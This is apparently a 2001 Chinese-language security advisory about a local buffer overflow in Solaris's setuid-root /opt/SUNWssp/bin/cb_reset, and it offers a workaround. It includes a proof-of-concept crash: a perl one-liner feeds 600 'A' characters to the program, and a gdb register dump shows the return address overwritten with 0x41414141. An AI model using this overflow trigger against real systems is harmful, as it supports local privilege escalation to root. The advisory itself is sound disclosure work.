Solaris /opt/SUNWssp/bin/cb_reset 缓冲区溢出漏洞

/ns/ld/unix/data/20010623110018.htm

涉及程序：
/opt/SUNWssp/bin/cb_reset

描述：
Solaris /opt/SUNWssp/bin/cb_reset 本地缓冲区溢出漏洞

详细：
近日发现 Solaris SUNWssp 软件包（并不在 Solaris 标准安装中）的 cb_reset 存在缓冲区溢出漏洞，该程序被置为 setuid root 位，但是却对输入参数没有进行完善的检查。本地攻击利用此漏洞能在受影响机器上执行任意代码。


以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负


$ uname -a
SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

$ ls /tftpboot/cb_port
/tftpboot/cb_port


$ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
Resetting host
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ether_hostton(SrcHost:laika): No such file or directory
ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAA): No such file or directory
Bus Error (core dumped)


$ gdb /opt/SUNWssp/bin/cb_reset --core=core
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)...
Core was generated by `/opt/SUNWssp/bin/cb_reset
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 10, Bus Error.
Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
(no debugging symbols found)...done.
Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
Reading symbols from /opt/SUNWssp/lib/liblogger.so...
(no debugging symbols found)...done.


[...]


Loaded symbols for /usr/lib/nss_files.so.1
#0 0x1219c in cb_send_frame ()
(gdb) info registers
g0 0x0 0
g1 0xff195b80 -15115392
g2 0xff322630 -13490640
g3 0xff332d78 -13423240
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x13278 78456
o1 0xff1bbab8 -14959944
o2 0xff1b8018 -14974952
o3 0x13278 78456
o4 0x13258 78424
o5 0xffbedb71 -4269199
sp 0xffbedb18 -4269288
o7 0x1218c 74124
l0 0xc3c3c3c3 -1010580541
l1 0x41414141 1094795585
l2 0x41414141 1094795585
l3 0x41414141 1094795585
l4 0x41414141 1094795585
l5 0x41414141 1094795585
l6 0x41414141 1094795585
l7 0x41414141 1094795585
i0 0x41414141 1094795585
i1 0x41414141 1094795585
i2 0x41414141 1094795585
i3 0x41414141 1094795585
i4 0x4141414d 1094795597
i5 0x41414141 1094795585
fp 0x41414141 1094795585
i7 0x41414141 1094795585 (***)
y 0xb 11
psr 0xfe801001 -25161727
wim 0x0 0
tbr 0x0 0
pc 0x1219c 74140
npc 0x121a0 74144
fpsr 0x0 0
cpsr 0x0 0
(gdb)
--

测试系统：
SunOS 5.8

解决方案：
SUN 尚未做出反应，
建议用户暂停使用此软件。